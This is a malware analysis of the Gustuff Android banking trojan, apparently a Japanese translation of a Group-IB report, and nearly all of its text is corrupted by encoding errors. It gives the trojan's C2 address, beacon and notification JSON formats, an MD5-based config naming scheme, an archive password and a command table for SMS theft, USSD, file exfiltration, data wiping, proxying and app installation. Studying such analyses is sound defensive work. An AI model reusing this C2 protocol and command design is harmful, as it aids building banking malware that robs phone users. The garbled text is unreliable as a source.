ã€ãå
æ¥ãGroup-IB
Group-IB ã®æªæã®ããã³ãŒãåæã®ã¹ãã·ã£ãªã¹ã ã€ã¯ã³ã»ããµã¬ã 圌ã¯ç 究ã®äžã§ãGustuff ã®ä»çµã¿ãšãã®å±éºæ§ã«ã€ããŠè©³ããèªã£ãŠããŸãã
ã°ã¹ã¿ãã¯èª°ãæ¢ããŠããã®ã§ããïŒ
Gustuff ã¯ãå®å šã«èªååãããæ©èœãåããæ°äžä»£ã®ãã«ãŠã§ã¢ã«å±ããŸãã éçºè ã«ãããšããã®ããã€ã®æšéŠ¬ã¯ AndyBot ãã«ãŠã§ã¢ã®æ¹è¯çã§ããã2017 幎 800 æ以æ¥ãAndroid ã¹ããŒããã©ã³ãæ»æããæåãªåœééè¡ã決æžã·ã¹ãã ã®ã¢ãã€ã« ã¢ããªã±ãŒã·ã§ã³ãè£ ã£ããã£ãã·ã³ã° Web ãã©ãŒã ãéããŠééãçãã§ããŸãã Bestoffer ã®å ±åã«ãããšãGustuff Bot ã®ã¬ã³ã¿ã«æéã¯æé¡ XNUMX ãã«ã§ããã
Gustuff ãµã³ãã«ã®åæã«ããããã®ããã€ã®æšéŠ¬ã¯ããã³ã¯ ãªã ã¢ã¡ãªã«ããã³ã¯ ãªã ã¹ã³ããã©ã³ããJP ã¢ã«ã¬ã³ããŠã§ã«ãº ãã¡ãŒãŽããã£ãã¿ã« ã¯ã³ãTD ãã³ã¯ãPNC éè¡ãªã©ã®å€§æéè¡ã®ã¢ãã€ã« ã¢ããªã±ãŒã·ã§ã³ãæå·é貚ãŠã©ã¬ããã䜿çšããŠãã顧客ãã¿ãŒã²ããã«ããŠããå¯èœæ§ãããããšãããããŸããããããã³ã€ã³ãŠã©ã¬ãããBitPayãCryptopayãCoinbaseãªã©
å ã ã¯å€å žçãªãã³ãã³ã°åããã€ã®æšéŠ¬ãšããŠäœæãããŸããããçŸåšã®ããŒãžã§ã³ã§ã¯ãGustuff ã¯æœåšçãªæ»æ察象ã®ãªã¹ããå€§å¹ ã«æ¡å€§ããŠããŸãã Gustuff ã¯ãéè¡ããã£ã³ããã¯äŒæ¥ãæå·ãµãŒãã¹åãã® Android ã¢ããªã±ãŒã·ã§ã³ã«å ããŠãããŒã±ãããã¬ã€ã¹ ã¢ããªã±ãŒã·ã§ã³ããªã³ã©ã€ã³ ã¹ãã¢ãæ¯æãã·ã¹ãã ãã€ã³ã¹ã¿ã³ã ã¡ãã»ã³ãžã£ãŒã®ãŠãŒã¶ãŒã察象ãšããŠããŸãã å ·äœçã«ã¯ãPayPalãWestern UnionãeBayãWalmartãSkypeãWhatsAppãGett TaxiãRevolut ãªã©ã§ãã
ãšã³ããªãã€ã³ã: éå£ææã®èšç®
Gustuff ã¯ãAPK ãžã®ãªã³ã¯ãå«ã SMS ã¡ãŒã«ãéã㊠Android ã¹ããŒããã©ã³ã«äŸµå ¥ãããå€å žçãªããã¯ãã«ãç¹åŸŽãšããŠããŸãã Android ããã€ã¹ããµãŒããŒã®åœä»€ã§ããã€ã®æšéŠ¬ã«ææãããšãGustuff ã¯ææããæºåž¯é»è©±ã®é£çµ¡å ããŒã¿ããŒã¹ãŸãã¯ãµãŒã㌠ããŒã¿ããŒã¹ãéããŠããã«æ¡æ£ããå¯èœæ§ããããŸãã Gustuff ã®æ©èœã¯ã倧éææãšãã®éå¶è ã®ããžãã¹ã®æ倧è³æ¬åãç®çãšããŠèšèšãããŠããŸããæ£èŠã®ã¢ãã€ã« ãã³ãã³ã° ã¢ããªã±ãŒã·ã§ã³ãšæå·ãŠã©ã¬ãããžã®ç¬èªã®ãèªåå ¥åãæ©èœãåããŠãããããã«ããééã®çé£ãè¿ éåããã³æ¡å€§ããããšãã§ããŸãã
ãã®ããã€ã®æšéŠ¬ã調æ»ãããšãããèªåå ¥åæ©èœãé害ã®ãã人åãã®ãµãŒãã¹ã§ããã¢ã¯ã»ã·ããªã㣠ãµãŒãã¹ã䜿çšããŠå®è£ ãããŠããããšãå€æããŸããã Gustuff ã¯ããã® Android ãµãŒãã¹ã䜿çšããä»ã®ã¢ããªã±ãŒã·ã§ã³ã®ãŠã£ã³ããŠèŠçŽ ãšã®çžäºäœçšã«å¯Ÿããä¿è·ãåé¿ããããšã«æåããæåã®ããã€ã®æšéŠ¬ã§ã¯ãããŸããã ãã ããã¢ã¯ã»ã·ããªã㣠ãµãŒãã¹ãã«ãŒãã£ã«ãšçµã¿åãããŠäœ¿çšââããããšã¯ãŸã éåžžã«ãŸãã§ãã
被害è ã®æºåž¯é»è©±ã«ããŠã³ããŒããããåŸãGustuff ã¯ã¢ã¯ã»ã·ããªã㣠ãµãŒãã¹ã䜿çšããŠãä»ã®ã¢ããªã±ãŒã·ã§ã³ (éè¡ãä»®æ³é貚ããªã³ã©ã€ã³ ã·ã§ããã³ã°ãã¡ãã»ãŒãžã³ã°ãªã©ã®ã¢ããªã±ãŒã·ã§ã³) ã®ãŠã£ã³ããŠèŠçŽ ãšå¯Ÿè©±ããæ»æè ã«å¿ èŠãªã¢ã¯ã·ã§ã³ãå®è¡ã§ããããã«ãªããŸãã ã ããšãã°ããµãŒããŒã®ã³ãã³ãã«ãããããã€ã®æšéŠ¬ã¯ãã¿ã³ãæŒããŠãéè¡ã¢ããªã±ãŒã·ã§ã³ã®ããã¹ã ãã£ãŒã«ãã®å€ãå€æŽããããšãã§ããŸãã Accessibility Service ã¡ã«ããºã ã䜿çšãããšããã®ããã€ã®æšéŠ¬ã¯ãéè¡ãåäžä»£ã®ã¢ãã€ã« ããã€ã®æšéŠ¬ã«å¯Ÿæããããã«äœ¿çšããã»ãã¥ãªã㣠ã¡ã«ããºã ããGoogle ã Android OS ã®æ°ããããŒãžã§ã³ã«å®è£ ããã»ãã¥ãªã㣠ããªã·ãŒã®å€æŽããã€ãã¹ããããšãã§ããŸãã ãããã£ãŠãGustuff 㯠Google Protect ä¿è·ãç¡å¹ã«ãããæ¹æ³ãç¥ã£ãŠããŸãããèè ã«ãããšããã®æ©èœã¯ 70% ã®å Žåã«æ©èœããŸãã
Gustuff ã¯ãæ£èŠã®ã¢ãã€ã« ã¢ããªã±ãŒã·ã§ã³ã®ã¢ã€ã³ã³ã䜿çšããŠåœã® PUSH éç¥ã衚瀺ããããšãã§ããŸãã ãŠãŒã¶ãŒã PUSH éç¥ãã¯ãªãã¯ãããšããµãŒããŒããããŠã³ããŒãããããã£ãã·ã³ã° ãŠã£ã³ããŠã衚瀺ãããããã§èŠæ±ãããéè¡ã«ãŒããŸãã¯æå·ãŠã©ã¬ããã®ããŒã¿ãå
¥åããŸãã å¥ã® Gustuff ã·ããªãªã§ã¯ãPUSH éç¥ã衚瀺ãããã¢ããªã±ãŒã·ã§ã³ãéãããŸãã ãã®å Žåããã«ãŠã§ã¢ã¯ãã¢ã¯ã»ã·ããªã㣠ãµãŒãã¹ãä»ãããµãŒããŒããã®ã³ãã³ãã«å¿ããŠãéè¡ã¢ããªã±ãŒã·ã§ã³ã®ãã©ãŒã ãã£ãŒã«ãã«äžæ£ãªååŒãå
¥åããå¯èœæ§ããããŸãã
Gustuff ã®æ©èœã«ã¯ãææããããã€ã¹ã«é¢ããæ å ±ã®ãµãŒããŒãžã®éä¿¡ãSMS ã¡ãã»ãŒãžã®èªã¿åã/éä¿¡ãUSSD ãªã¯ãšã¹ãã®éä¿¡ãSOCKS5 ãããã·ã®èµ·åããªã³ã¯ã®è¿œè·¡ããã¡ã€ã« (ææžã®åçã¹ãã£ã³ãã¹ã¯ãªãŒã³ã·ã§ãããåçãå«ã) ãžã®éä¿¡ãå«ãŸããŸãããµãŒããŒãåé€ããããã€ã¹ãå·¥å Žåºè·æã®èšå®ã«ãªã»ããããŸãã
ãã«ãŠã§ã¢åæ
æªæã®ããã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ããåã«ãAndroid OS ã¯ãGustuff ã«ãã£ãŠèŠæ±ãããæš©éã®ãªã¹ããå«ããŠã£ã³ããŠããŠãŒã¶ãŒã«è¡šç€ºããŸãã
ã¢ããªã±ãŒã·ã§ã³ã¯ãŠãŒã¶ãŒã®åæãåŸãåŸã«ã®ã¿ã€ã³ã¹ããŒã«ãããŸãã ã¢ããªã±ãŒã·ã§ã³ãèµ·åãããšãããã€ã®æšéŠ¬ã¯ãŠãŒã¶ãŒã«æ¬¡ã®ãŠã£ã³ããŠã衚瀺ããŸãã
ãã®åŸãã¢ã€ã³ã³ãåé€ãããŸãã
èè ã«ããã°ãGustuff 㯠FTT ã®æ¢±å æ¥è ã«ãã£ãŠæ¢±å ãããŠããŸãã èµ·ååŸãã¢ããªã±ãŒã·ã§ã³ã¯å®æçã« CnC ãµãŒããŒã«æ¥ç¶ããŠã³ãã³ããåä¿¡ããŸãã 調æ»ããããã€ãã®ãã¡ã€ã«ã§ã¯ãå¶åŸ¡ãµãŒããŒãšã㊠IP ã¢ãã¬ã¹ã䜿çšãããŠããŸããã 88.99.171[ã]105 (以äžããšè¡šèšããŸã) <%CnC%>).
èµ·ååŸãããã°ã©ã ã¯ãµãŒããŒãžã®ã¡ãã»ãŒãžã®éä¿¡ãéå§ããŸãã http://<%CnC%>/api/v1/get.php.
å¿çã¯æ¬¡ã®åœ¢åŒã® JSON ã§ããããšãæ³å®ãããŸãã
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}
ã¢ããªã±ãŒã·ã§ã³ãã¢ã¯ã»ã¹ããããã³ã«ãææããããã€ã¹ã«é¢ããæ å ±ãéä¿¡ãããŸãã ã¡ãã»ãŒãžã®ãã©ãŒãããã以äžã«ç€ºããŸãã 泚ç®ã«å€ããã®ã¯ããã£ãŒã«ã ãã«, äœåãª, ã¢ã㪠О èš±å¯ â ãªãã·ã§ã³ã§ãCnC ããã®èŠæ±ã³ãã³ãã®å Žåã«ã®ã¿éä¿¡ãããŸãã
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
}
èšå®ããŒã¿ã®ä¿å
Gustuff ã¯ãéçšäžéèŠãªæ å ±ãèšå®ãã¡ã€ã«ã«ä¿åããŸãã ãã¡ã€ã«åãšãã®äžã®ãã©ã¡ãŒã¿ã®ååã¯ãæååãã MD5 åèšãèšç®ããçµæã§ãã 15413090667214.6.1<%name%>ã©ã <%name%> â åæã®ååãšå€ã ååçæé¢æ°ã® Python 解é:
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
以äžã§ã¯ãããã次ã®ããã«è¡šããŸã ååãžã§ãã¬ãŒã¿ãŒ(å
¥å).
ãããã£ãŠãæåã®ãã¡ã€ã«åã¯æ¬¡ã®ããã«ãªããŸãã nameGenerator("API_SERVER_LIST")ã次ã®ååã®å€ãå«ãŸããŠããŸãã
å€æ°å | å€ |
---|---|
nameGenerator("API_SERVER_LIST") | CnC ã¢ãã¬ã¹ã®ãªã¹ããé å圢åŒã§å«ãŸããŸãã |
nameGenerator("API_SERVER_URL") | CnC ã¢ãã¬ã¹ãå«ãŸããŸãã |
nameGenerator("SMS_UPLOAD") | ãã©ã°ã¯ããã©ã«ãã§èšå®ãããŸãã ãã©ã°ãèšå®ãããŠããå ŽåãSMS ã¡ãã»ãŒãžã CnC ã«éä¿¡ããŸãã |
nameGenerator("SMS_ROOT_NUMBER") | ææããããã€ã¹ãåä¿¡ãã SMS ã¡ãã»ãŒãžã®éä¿¡å ã®é»è©±çªå·ã ããã©ã«ãã¯nullã§ãã |
nameGenerator("SMS_ROOT_NUMBER_RESEND") | ãã©ã°ã¯ããã©ã«ãã§ã¯ã¯ãªã¢ãããŸãã ã€ã³ã¹ããŒã«ãããŠããå Žåãææããããã€ã¹ã SMS ãåä¿¡ãããšãSMS ã¯ã«ãŒãçªå·ã«éä¿¡ãããŸãã |
nameGenerator("DEFAULT_APP_SMS") | ãã©ã°ã¯ããã©ã«ãã§ã¯ã¯ãªã¢ãããŸãã ãã®ãã©ã°ãèšå®ãããŠããå Žåãã¢ããªã±ãŒã·ã§ã³ã¯åä¿¡ SMS ã¡ãã»ãŒãžãåŠçããŸãã |
nameGenerator("DEFAULT_ADMIN") | ãã©ã°ã¯ããã©ã«ãã§ã¯ã¯ãªã¢ãããŸãã ãã©ã°ãèšå®ãããŠããå Žåãã¢ããªã±ãŒã·ã§ã³ã«ã¯ç®¡çè æš©éããããŸãã |
nameGenerator("DEFAULT_ACCESSIBILITY") | ãã©ã°ã¯ããã©ã«ãã§ã¯ã¯ãªã¢ãããŸãã ãã©ã°ãèšå®ãããŠããå Žåãã¢ã¯ã»ã·ããªã㣠ãµãŒãã¹ã䜿çšãããµãŒãã¹ãå®è¡ãããŠããŸãã |
nameGenerator("APPS_CONFIG") | ç¹å®ã®ã¢ããªã±ãŒã·ã§ã³ã«é¢é£ä»ããããã¢ã¯ã»ã·ããªã㣠ã€ãã³ããããªã¬ãŒããããšãã«å®è¡ããå¿ èŠãããã¢ã¯ã·ã§ã³ã®ãªã¹ããå«ã JSON ãªããžã§ã¯ãã |
nameGenerator("APPS_INSTALLED") | ããã€ã¹ã«ã€ã³ã¹ããŒã«ãããŠããã¢ããªã±ãŒã·ã§ã³ã®ãªã¹ããä¿åããŸãã |
nameGenerator("IS_FIST_RUN") | ãã©ã°ã¯ååèµ·åæã«ãªã»ãããããŸãã |
nameGenerator("UNIQUE_ID") | äžæã®èå¥åãå«ãŸããŸãã ããããåããŠèµ·åããããšãã«çæãããŸãã |
ãµãŒããŒããã®ã³ãã³ããåŠçããã¢ãžã¥ãŒã«
ã¢ããªã±ãŒã·ã§ã³ã¯ãCnC ãµãŒããŒã®ã¢ãã¬ã¹ãã次ã®ããã«ãšã³ã³ãŒããããé åã®åœ¢åŒã§ä¿åããŸãã Base85 ç·ã CnC ãµãŒããŒã®ãªã¹ãã¯ãé©åãªã³ãã³ããåä¿¡ãããšå€æŽã§ããŸãããã®å Žåãã¢ãã¬ã¹ã¯èšå®ãã¡ã€ã«ã«ä¿åãããŸãã
ãªã¯ãšã¹ãã«å¿ããŠããµãŒããŒã¯ã¢ããªã±ãŒã·ã§ã³ã«ã³ãã³ããéä¿¡ããŸãã ã³ãã³ããšãã©ã¡ãŒã¿ã¯ JSON 圢åŒã§è¡šãããããšã«æ³šæããŠãã ããã ã¢ããªã±ãŒã·ã§ã³ã¯æ¬¡ã®ã³ãã³ããåŠçã§ããŸãã
ããŒã | 説æ |
---|---|
åé²ã¹ã¿ãŒã | ææããããã€ã¹ãåä¿¡ãã SMS ã¡ãã»ãŒãžã® CnC ãµãŒããŒãžã®éä¿¡ãéå§ããŸãã |
åé²åæ¢ | ææããããã€ã¹ãåä¿¡ãã SMS ã¡ãã»ãŒãžã® CnC ãµãŒããŒãžã®éä¿¡ãåæ¢ããŸãã |
ussdå®è¡ | USSDãªã¯ãšã¹ããå®è¡ããŸãã USSD ãªã¯ãšã¹ããè¡ãå¿ èŠãããçªå·ã¯ãJSON ãã£ãŒã«ãã®ãnumberãã«ãããŸãã |
SMSãéä¿¡ | XNUMX ã€ã® SMS ã¡ãã»ãŒãžãéä¿¡ããŸã (å¿ èŠã«å¿ããŠãã¡ãã»ãŒãžã¯ããã€ãã®éšåã«ãåå²ããããŸã)ã ãã®ã³ãã³ãã¯ãã©ã¡ãŒã¿ãšããŠããã£ãŒã«ããtoãïŒå®å çªå·ïŒãšãbodyãïŒã¡ãã»ãŒãžã®æ¬æïŒãå«ã JSON ãªããžã§ã¯ããåãåããŸãã |
SendSmsAb | ææããããã€ã¹ã®é£çµ¡å ãªã¹ãã«ç»é²ãããŠããå šå¡ã« SMS ã¡ãã»ãŒãžãéä¿¡ããŸã (å¿ èŠã«å¿ããŠãã¡ãã»ãŒãžã¯ããã€ãã®éšåã«ãåå²ããããŸã)ã ã¡ãã»ãŒãžã®éä¿¡éé㯠10 ç§ã§ãã ã¡ãã»ãŒãžã®æ¬æ㯠JSON ãã£ãŒã«ããbodyãã«ãããŸã |
sendSmsMass | ã³ãã³ã ãã©ã¡ãŒã¿ã§æå®ãããé£çµ¡å ã« SMS ã¡ãã»ãŒãžãéä¿¡ããŸã (å¿ èŠã«å¿ããŠãã¡ãã»ãŒãžã¯ããã€ãã®éšåã«ãåå²ããããŸã)ã ã¡ãã»ãŒãžã®éä¿¡éé㯠10 ç§ã§ãã ãã®ã³ãã³ãã¯ãã©ã¡ãŒã¿ãšã㊠JSON é å (ãsmsããã£ãŒã«ã) ãåãåããŸãããã®èŠçŽ ã«ã¯ãå®å çªå·ã§ãããtoããã£ãŒã«ããšã¡ãã»ãŒãžã®æ¬æã§ãããbodyããã£ãŒã«ããå«ãŸããŠããŸãã |
ãµãŒããŒå€æŽ | ãã®ã³ãã³ãã¯ããã©ã¡ãŒã¿ãšããŠããŒãurlããæã€å€ãåãåãããšãã§ããŸãããã®å Žåãããã㯠nameGenerator(ãSERVER_URLã) ãŸãã¯ãarrayãã®å€ãå€æŽããŸãããã®åŸããããã¯é åã nameGenerator (ãAPI_SERVER_LISTã) ã«æžã蟌ã¿ãŸãããããã£ãŠãã¢ããªã±ãŒã·ã§ã³ã¯ CnC ãµãŒããŒã®ã¢ãã¬ã¹ãå€æŽããŸãã |
管çè çªå· | ãã®ã³ãã³ãã¯ãã«ãŒãçªå·ãæäœããããã«èšèšãããŠããŸãã ãã®ã³ãã³ãã¯ã次ã®ãã©ã¡ãŒã¿ãŒãæ〠JSON ãªããžã§ã¯ããåãå ¥ããŸãããnumberã - nameGenerator(ãROOT_NUMBERã) ãåä¿¡ããå€ã«å€æŽããŸãããresendã - nameGenerator(ãSMS_ROOT_NUMBER_RESENDã) ãå€æŽããŸãããsendIdã - nameGenerator(ãROOT_NUMBERãã«éä¿¡ããŸã) ïŒ äžæã®IDã |
æŽæ°æ å ± | ææããããã€ã¹ã«é¢ããæ å ±ããµãŒããŒã«éä¿¡ããŸãã |
ããŒã¿ãæ¶ã | ãã®ã³ãã³ãã¯ãŠãŒã¶ãŒ ããŒã¿ãåé€ããããšãç®çãšããŠããŸãã ã¢ããªã±ãŒã·ã§ã³ãèµ·åãããååã«å¿ããŠãããã€ã¹ã®åèµ·åã«ãã£ãŠããŒã¿ãå®å šã«æ¶å»ãããã (ãã©ã€ã㪠ãŠãŒã¶ãŒ)ããŠãŒã¶ãŒ ããŒã¿ã®ã¿ãåé€ãããŸã (ã»ã«ã³ã㪠ãŠãŒã¶ãŒ)ã |
éŽäžã¹ã¿ãŒã | ãããã·ã¢ãžã¥ãŒã«ãèµ·åããŸãã ã¢ãžã¥ãŒã«ã®åäœã«ã€ããŠã¯å¥ã®ã»ã¯ã·ã§ã³ã§èª¬æããŸãã |
éŽäžåæ¢ | ãããã·ã¢ãžã¥ãŒã«ãåæ¢ããŸãã |
ãªãŒãã³ãªã³ã¯ | ãªã³ã¯ã«åŸã£ãŠãã ããã ãªã³ã¯ã¯ããurlãããŒã®äžã® JSON ãã©ã¡ãŒã¿ã«ãããŸãã ãªã³ã¯ãéãã«ã¯ãandroid.intent.action.VIEWãã䜿çšããŸãã |
ãã¹ãŠã®SMSãã¢ããããŒã | ããã€ã¹ãåä¿¡ãããã¹ãŠã® SMS ã¡ãã»ãŒãžããµãŒããŒã«éä¿¡ããŸãã |
ãã¹ãŠã®åçãã¢ããããŒã | ææããããã€ã¹ãã URL ã«ç»åãéä¿¡ããŸãã URL ã¯ãã©ã¡ãŒã¿ãšããŠæäŸãããŸãã |
ãã¡ã€ã«ãã¢ããããŒããã | ææããããã€ã¹ãã URL ã«ãã¡ã€ã«ãéä¿¡ããŸãã URL ã¯ãã©ã¡ãŒã¿ãšããŠæäŸãããŸãã |
é»è©±çªå·ãã¢ããããŒããã | é£çµ¡å ãªã¹ãã®é»è©±çªå·ããµãŒããŒã«éä¿¡ããŸãã ããŒãabããæ〠JSON ãªããžã§ã¯ãå€ããã©ã¡ãŒã¿ãŒãšããŠåãåããšãã¢ããªã±ãŒã·ã§ã³ã¯é»è©±åž³ããé£çµ¡å ã®ãªã¹ããåãåããŸãã ããŒãsmsããæ〠JSON ãªããžã§ã¯ãããã©ã¡ãŒã¿ãšããŠåä¿¡ãããšãã¢ããªã±ãŒã·ã§ã³ã¯ SMS ã¡ãã»ãŒãžã®éä¿¡è ããé£çµ¡å ã®ãªã¹ããèªã¿åããŸãã |
å€æŽã¢ãŒã«ã€ã | ã¢ããªã±ãŒã·ã§ã³ã¯ããurlãããŒã䜿çšããŠãã©ã¡ãŒã¿ãšããŠæž¡ãããã¢ãã¬ã¹ãããã¡ã€ã«ãããŠã³ããŒãããŸãã ããŠã³ããŒããããã¡ã€ã«ã¯ãarchive.zipããšããååã§ä¿åãããŸãã 次ã«ã¢ããªã±ãŒã·ã§ã³ã¯ããªãã·ã§ã³ã§ã¢ãŒã«ã€ã ãã¹ã¯ãŒããb5jXh37gxgHBrZhQ4j3Dãã䜿çšããŠãã¡ã€ã«ã解åããŸãã 解åããããã¡ã€ã«ã¯[å€éšã¹ãã¬ãŒãž]/hgpsãã£ã¬ã¯ããªã«ä¿åãããŸãã ãã®ãã£ã¬ã¯ããªã«ã¯ãã¢ããªã±ãŒã·ã§ã³ã¯ Web ãã§ã€ã¯ãä¿åããŸã (åŸè¿°)ã |
è¡å | ãã®ã³ãã³ãã¯ãã¢ã¯ã·ã§ã³ ãµãŒãã¹ã§åäœããããã«èšèšãããŠãããããã«ã€ããŠã¯å¥ã®ã»ã¯ã·ã§ã³ã§èª¬æããŸãã |
test | äœãããªãã |
ããŠã³ããŒã | ãã®ã³ãã³ãã¯ããªã¢ãŒã ãµãŒããŒãããã¡ã€ã«ãããŠã³ããŒãããããããDownloadsããã£ã¬ã¯ããªã«ä¿åããããšãç®çãšããŠããŸãã URL ãšãã¡ã€ã«åã¯ããããã JSON ãã©ã¡ãŒã¿ ãªããžã§ã¯ãã®ãã©ã¡ãŒã¿ãurlããšãfileNameããã£ãŒã«ããšããŠæäŸãããŸãã |
åé€ããŸã | ãããŠã³ããŒãããã£ã¬ã¯ããªãããã¡ã€ã«ãåé€ããŸãã ãã¡ã€ã«åã¯ããfileNameãããŒãæ〠JSON ãã©ã¡ãŒã¿ãŒã§æå®ãããŸãã æšæºã®ãã¡ã€ã«åã¯ãtmp.apkãã§ãã |
éç¥ | 管çãµãŒããŒã«ãã£ãŠå®çŸ©ããã説æãšã¿ã€ãã«ã®ããã¹ããå«ãéç¥ã衚瀺ããŸãã |
ã³ãã³ããã©ãŒããã éç¥:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}
調æ»äžã®ãã¡ã€ã«ã«ãã£ãŠçæãããéç¥ã¯ããã£ãŒã«ãã§æå®ãããã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠçæãããéç¥ãšåäžã«èŠããŸãã ã¢ããªã ãã£ãŒã«ãå€ã ã¢ããªãéã â Trueãéç¥ãéããããšããã£ãŒã«ãã§æå®ãããã¢ããªã±ãŒã·ã§ã³ãèµ·åããŸã ã¢ããªã ãã£ãŒã«ãå€ã ã¢ããªãéã â åœã®å Žå:
- ãã£ãã·ã³ã° ãŠã£ã³ããŠãéãããã®å 容ããã£ã¬ã¯ããªããããŠã³ããŒããããŸãã <%å€éšã¹ãã¬ãŒãž%>/hgps/<%ãã¡ã€ã«å%>
- ãã£ãã·ã³ã° ãŠã£ã³ããŠãéãããã®å 容ããµãŒããŒããããŠã³ããŒããããŸã <%url%>?id=<%Bot id%>&app=<%ã¢ããªã±ãŒã·ã§ã³å%>
- Google Play ã«ãŒããè£ ã£ããã£ãã·ã³ã° ãŠã£ã³ããŠãéããã«ãŒãã®è©³çŽ°ãå ¥åããããæ±ããããŸãã
ã¢ããªã±ãŒã·ã§ã³ã¯ã³ãã³ãã®çµæã次ã®å®å ã«éä¿¡ããŸãã <%CnC%>set_state.php 次ã®åœ¢åŒã® JSON ãªããžã§ã¯ããšããŠã
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
ã¢ã¯ã·ã§ã³ãµãŒãã¹
ã¢ããªã±ãŒã·ã§ã³ãåŠçããã³ãã³ãã®ãªã¹ãã«ã¯æ¬¡ã®ãã®ãå«ãŸããŸãã ã¢ã¯ã·ã§ã³ã ã³ãã³ãåŠçã¢ãžã¥ãŒã«ã¯ã³ãã³ããåä¿¡ãããšããã®ãµãŒãã¹ã«ã¢ã¯ã»ã¹ããŠæ¡åŒµã³ãã³ããå®è¡ããŸãã ãã®ãµãŒãã¹ã¯ãJSON ãªããžã§ã¯ãããã©ã¡ãŒã¿ãšããŠåãå
¥ããŸãã ãµãŒãã¹ã¯æ¬¡ã®ã³ãã³ããå®è¡ã§ããŸãã
1. PARAMS_ACTION â ãã®ãããªã³ãã³ããåä¿¡ãããšããµãŒãã¹ã¯ãŸã JSON ãã©ã¡ãŒã¿ãŒãã Type ããŒã®å€ãåãåããŸããããã¯æ¬¡ã®ãšããã§ãã
- ãµãŒãã¹æ å ± â ãµãã³ãã³ãã¯ãJSON ãã©ã¡ãŒã¿ãŒããããŒã«ãã£ãŠå€ãååŸããŸãã å«ãéèŠã§ã¯ãªãã ãã©ã°ã True ã®å Žåãã¢ããªã±ãŒã·ã§ã³ã¯ãã©ã°ãèšå®ããŸãã FLAG_ISOLATED_PROCESS ã¢ã¯ã»ã·ããªãã£ãµãŒãã¹ã䜿çšããŠãµãŒãã¹ã«ã¢ã¯ã»ã¹ããŸãã ãã®ããã«ããŠããµãŒãã¹ã¯å¥ã®ããã»ã¹ã§éå§ãããŸãã
- ã«ãŒã â çŸåšãã©ãŒã«ã¹ãããŠãããŠã£ã³ããŠã«é¢ããæ å ±ãåä¿¡ãããµãŒããŒã«éä¿¡ããŸãã ã¢ããªã±ãŒã·ã§ã³ã¯ãAccessibilityNodeInfo ã¯ã©ã¹ã䜿çšããŠæ å ±ãååŸããŸãã
- 管ç人 â 管çè æš©éãèŠæ±ããŸãã
- é ããã â ãdataãããŒã®ãã©ã¡ãŒã¿ã§æå®ãããããªç§éãActionsService ãäžæåæ¢ããŸãã
- ãŠã£ã³ããŠãº â ãŠãŒã¶ãŒã«è¡šç€ºããããŠã£ã³ããŠã®ãªã¹ããéä¿¡ããŸãã
- install â ææããããã€ã¹ã«ã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ããŸãã ã¢ãŒã«ã€ã ããã±ãŒãžã®ååã¯ãfileNameãããŒã«ãããŸãã ã¢ãŒã«ã€ãèªäœã¯ãDownloads ãã£ã¬ã¯ããªã«ãããŸãã
- å
šäœç㪠â ãµãã³ãã³ãã¯ãçŸåšã®ãŠã£ã³ããŠãã移åããããšãç®çãšããŠããŸãã
- ã¯ã€ãã¯èšå®ã¡ãã¥ãŒã§
- åã«
- 家
- éç¥ãž
- æè¿éããã¢ããªã±ãŒã·ã§ã³ãŠã£ã³ããŠãž
- èµ·åãã - ã¢ããªã±ãŒã·ã§ã³ãèµ·åããŸãã ã¢ããªã±ãŒã·ã§ã³åã¯ããŒã«ãããã©ã¡ãŒã¿ãšããŠæäŸãããŸã ããŒã¿.
- é³ â ãµãŠã³ãã¢ãŒããç¡é³ã«å€æŽããŸãã
- ã¢ã³ãã㯠â ç»é¢ãšããŒããŒãã®ããã¯ã©ã€ããæ倧ã®æãããŸã§ãªã³ã«ããŸãã ã¢ããªã±ãŒã·ã§ã³ã¯ãæåå [Application lable]:INFO ãã¿ã°ãšããŠæå®ããŠãWakeLock ã䜿çšããŠãã®ã¢ã¯ã·ã§ã³ãå®è¡ããŸãã
